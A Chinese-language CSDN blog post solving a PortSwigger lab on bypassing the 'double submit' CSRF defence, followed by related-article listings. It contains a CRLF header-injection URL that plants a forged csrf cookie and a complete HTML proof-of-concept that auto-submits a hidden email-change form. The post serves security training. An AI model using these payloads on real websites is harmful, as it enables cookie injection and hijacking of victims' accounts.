Lab: CSRF where token is duplicated in cookie CSRF,其中令牌在 cookie 中重复

最新推荐文章于 2022-05-13 20:55:56 发布
最新推荐文章于 2022-05-13 20:55:56 发布
阅读量332 收藏 1
点赞数
文章标签: java 安全 session cookie csrf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZripenYe/article/details/120793634
版权

在上述漏洞的进一步变体中,一些应用程序不维护任何已发布令牌的服务器端记录,而是在 cookie 和请求参数中复制每个令牌。在验证后续请求时,应用程序只需验证请求参数中提交的令牌是否与 cookie 中提交的值匹配。这有时被称为针对 CSRF 的“双重提交”防御,并且被提倡是因为它易于实现并且避免了任何服务器端状态的需要:

POST /email/change HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
Cookie: session=1DQGdzYbOJQzLP7460tfyiv3do7MjyPw; csrf=R8ov2YBfTYmzFyjit8o2hKBuoIjXXVpa

csrf=R8ov2YBfTYmzFyjit8o2hKBuoIjXXVpa&email=wiener@normal-user.com

在这种情况下,如果网站包含任何 cookie 设置功能,攻击者可以再次执行 CSRF 攻击。在这里,攻击者不需要获得他们自己的有效令牌。他们只是发明了一个令牌(可能是所需的格式,如果正在检查),利用 cookie 设置行为将他们的 cookie 放入受害者的浏览器,并在他们的 CSRF 攻击中将他们的令牌提供给受害者。

本实验室的电子邮件更改功能易受 CSRF 攻击。它试图使用不安全的“双重提交”CSRF 预防技术。

要解决该实验,请使用您的漏洞利用服务器托管一个 HTML 页面,该页面使用CSRF 攻击来更改查看者的电子邮件地址。

您可以使用以下凭据登录自己的帐户: wiener:peter

方法

使用您的浏览器通过 Burp Suite 代理流量,登录您的帐户,提交“更新电子邮件”表单,然后在您的代理历史记录中找到生成的请求。
将请求发送到 Burp Repeater 并观察csrfbody 参数的值只是通过将它与csrfcookie进行比较来验证。image
执行搜索,将结果请求发送到 Burp Repeater,并观察搜索词是否反映在 Set-Cookie 标头中。由于搜索功能没有 CSRF 保护,您可以使用它来将 cookie 注入受害者用户的浏览器。image
创建一个 URL,利用此漏洞将虚假csrfcookie 注入受害者的浏览器:
/?search=test%0d%0aSet-Cookie:%20csrf=fakeimage
按照没有防御实验室 的CSRF 漏洞解决方案中的说明创建并托管概念验证漏洞利用,确保您的CSRF 令牌设置为“假”。应该从电子邮件更改请求中创建漏洞利用。
删除脚本块,改为添加以下代码以注入 cookie 并提交表单:
存储漏洞,然后单击“交付给受害者”以解决实验室问题。

代码如下:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://ac131fb51eff23f3804fc2d8002100d1.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="wiener&#64;administrator&#46;net" />
      <input type="hidden" name="csrf" value="1234abcd" />
    </form>
<img src="https://ac131fb51eff23f3804fc2d8002100d1.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=1234abcd" onerror="document.forms[0].submit();"/>
  </body>
</html>
Zeker62
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
靶场:csrf绕过手法1(session验证相关)
kiwi的博客
03-26 482
本次的带来的是这三个靶场csrf的防御措施为在数据包当(非cookie)当传入一个令牌,攻击者是无法知道此令牌的。
「网络安全渗透」如果你还不懂CSRF?这一篇让你彻底掌握
yinjiyufei的博客
01-14 3215
「网络安全渗透」如果你还不懂CSRF?这一篇让你彻底掌握
Lab: CSRF where token is tied to non-session cookieCSRF,其令牌与非会话 cookie 相关联...
Zeker62的博客
08-26 574
CSRF 令牌绑定到非会话 cookie 在上述漏洞的变体,某些应用程序确实将 CSRF 令牌绑定到 cookie,但与用于跟踪会话的 cookie 不同。当应用程序使用两种不同的框架时,这很容易发生,一种用于会话处理,一种用于 CSRF 保护,它们没有集成在一起: POST /email/change HTTP/1.1 Host: vulnerable-website.com Content...
Lab: CSRF where token is not tied to user session:CSRF,其令牌与用户会话无关
Zeker62的博客
08-26 315
本实验室的电子邮件更改功能易受 CSRF 攻击。它使用令牌来尝试防止 CSRF 攻击,但它们没有集成到站点的会话处理系统。 要解决该实验,请使用您的漏洞利用服务器托管一个 HTML 页面,该页面使用CSRF 攻击来更改查看者的电子邮件地址。 您在应用程序上有两个帐户,可用于帮助设计攻击。凭据如下: wiener:peter carlos:montoya CSRF 令牌不绑定到用户会话 某些应用...
PortSwigger Academy | Cross-site request forgery (CSRF) : 跨站请求伪造
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
02-02 1097
文章目录什么是CSRFCSRF攻击有什么影响?CSRF如何工作?使用SameSite Cookie防御CSRF如何构造CSRF攻击Lab: CSRF vulnerability with no defenses如何进行CSRF攻击XSS vs CSRFXSS和CSRF有什么区别?CSRF令牌可以阻止XSS攻击吗?防止CSRF攻击CSRF token什么是CSRF令牌CSRF令牌应如何生成?CSRF令牌应如何传输?CSRF令牌应如何验证?常见的CSRF漏洞CSRF令牌的验证取决于请求方法Lab: CSRF
解决Django提交表单报错:CSRF token missing or incorrect的问题
12-20
当用户提交表单时,Django会检查表单提供的CSRF令牌是否与Cookie令牌匹配,如果匹配,则认为请求是安全的,否则会抛出"CSRF token missing or incorrect"的错误。 解决这个错误的方法通常涉及以下几个步骤: ...
在django使用post方法时,需要增加csrftoken的例子
12-20
在Django web开发框架安全是至关重要的一个方面,其CSRF(Cross-site request forgery,跨站请求伪造)防护机制就是一个核心组件。当使用POST方法发送数据时,Django要求添加一个CSRFcsrf_token令牌,以...
csurf:CSRF令牌间件
02-04
冲浪 Node.js 保护间件。 需要首先初始化会话间件或。... 该间件添加了一个req.csrfToken()函数以创建一个令牌,该令牌应添加到在隐藏的表单字段,查询字符串等改变状态的请求。此令牌针对访问者的会话
CSRF(Cross-Site Request Forgery) 跨站请求伪造
Eason_LYC安全白帽子的成长博客
05-13 1568
WEB安全CSRF漏洞攻击最为全面的知识点总结,直击核心知识点,将零散的知识汇总梳理。为深入学习CSRF打下良好基础!
CSRFCookieSessiontoken之间不得不说得那些事儿
besmarterbestronger的博客
10-14 5180
文章目录1. 前言2. 什么是crsf?如何防止3. 什么是cookie?有什么用?机制?4. 什么是session?有什么用?机制?5. 什么是token?有什么用?为什么能防止csrf?6. 总结7. 参考文献 1. 前言 2. 什么是crsf?如何防止 3. 什么是cookie?有什么用?机制? 4. 什么是session?有什么用?机制? 5. 什么是token?有什么用?为什么能防止cs...
Lab: CSRF where token validation depends on token being present:CSRF,其令牌验证取决于是否存在令牌...
Zeker62的博客
08-26 199
CSRF 令牌的验证取决于是否存在令牌 某些应用程序在令牌存在时正确验证令牌,但如果省略令牌则跳过验证。 在这种情况下,攻击者可以移除包含令牌的整个参数(不仅仅是它的值)来绕过验证并发起 CSRF 攻击 将请求发送到 Burp Repeater 并观察,如果您更改csrf参数的值,则该请求将被拒绝。 csrf完全 删除参数并观察请求现在已被接受。 还是那个代码: <html> &...
syntax error, expect RPAREN, actual IDENTIFIER pos 375, token IDENTIFIER INTEGER
从零开始的博客
07-31 1万+
使用 mysql 列出当前日期下的每一天数据: SELECT DATE_ADD( CURDATE( ), INTERVAL ( CAST( help_topic_id AS SIGNED INTEGER ) - ( DAYOFMONTH( CURDATE( ) ) - 1 ) ) day ) day1 FROM mysql.help_topic WHERE help_topic_
Vue SSR服务端渲染改造踩坑指南
chen801090的博客
05-07 8557
版本匹配 Vue的SSR渲染,可以当作一个全新的项目,需要安装依赖的模块(node_modules),可以将原先使用vue cli 3创建的项目的package.json拷贝过来,确保不缺少相关模块,然后在此基础上添加SSR需要的模块。 主要是vue-server-renderer: npm install vue vue-server-renderer --save vue-serv...
Spring security开启csrf后,一直403并且无法获取csrftoken
Leo的博客
06-29 2289
后端的配置代码增加 .csrf().csrfTokenRepository(CookieCsrfTokenRepository.withHttpOnlyFalse()) 要将http-only设置为false才可以获取 这样就成功了
Spring Boot application.properties或application.yml相关配置
乐于学习、乐于分享、乐于总结
01-28 5万+
# =================================================================== # COMMON SPRING BOOT PROPERTIES # # This sample file is provided as a guideline. Do NOT copy it in its # entirety to your own appl
Spring-Boot (二) application.properties配置文件内容
热门推荐
t0m的专栏
11-10 7万+
Spring-Boot官方开发指导文档 默认创建spring-boot项目后,会在resources目录下生成一个空的application.properties配置文件,springboot启动时加载该配置文件。 application.properties(或者application.yml)包含系统属性、环境变量、命令参数这类信息。 下面简要说一部分spring-boot项目a
Github API v3 -Overview
CSDN你大爷的的专栏
11-30 1万+
Overview 概观 This describes the resources that make up the official GitHub API v3. If you have any problems or requests please contact support. 下面是官方GitHub API v3.组成资源的描述,如果你有任何问题或者请求,请联系网站的支持方
Spring Boot 配置属性
weixin_34221112的博客
05-19 528
为什么80%的码农都做不了架构师?>>> ...
OWASP_top_10漏洞的总结笔记
Mi1k7ea
04-11 2万+
这里简单地写一些关于OWASP top 10 漏洞的一些利用技巧以及检测方法、防御方法等的笔记(很多是参考了《Web漏洞讲解》),有新的理解和学会好的方法之后会更新~ 同时也希望各位大牛给给建议~ SQL Injection&amp;Blind SQL Injection(SQL注入与SQL盲注漏洞): 一、绕过WAF的方法: 1. 大小写绕过 2. 简单编码绕过 3. 注释绕过: ...
"detail": "CSRF Failed: CSRF token missing."
最新发布
11-05
"detail": "CSRF Failed: CSRF token missing."这个错误提示表明在Django接口请求缺少CSRF token,导致验证失败。CSRF token是一种安全机制,用于防止跨站请求伪造攻击。在Django,当用户登录并访问受保护的页面时,Django会生成一个CSRF token,并将其存储在用户的cookies。当用户提交表单时,Django会检查表单CSRF token是否与cookiesCSRF token匹配,以确保请求是合法的。如果请求缺少或错误地提供了CSRF token,则会出现"CSRF Failed: CSRF token missing."这个错误提示。 解决这个问题的方法是在请求包含正确的CSRF token。可以通过在表单添加{% csrf_token %}标签来自动生成CSRF token,并将其包含在POST请求。另外,还可以在请求头添加X-CSRFToken字段,将cookiesCSRF token作为值传递。如果使用的是第三方库发送请求,则需要查看该库的文档,了解如何在请求包含CSRF token

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值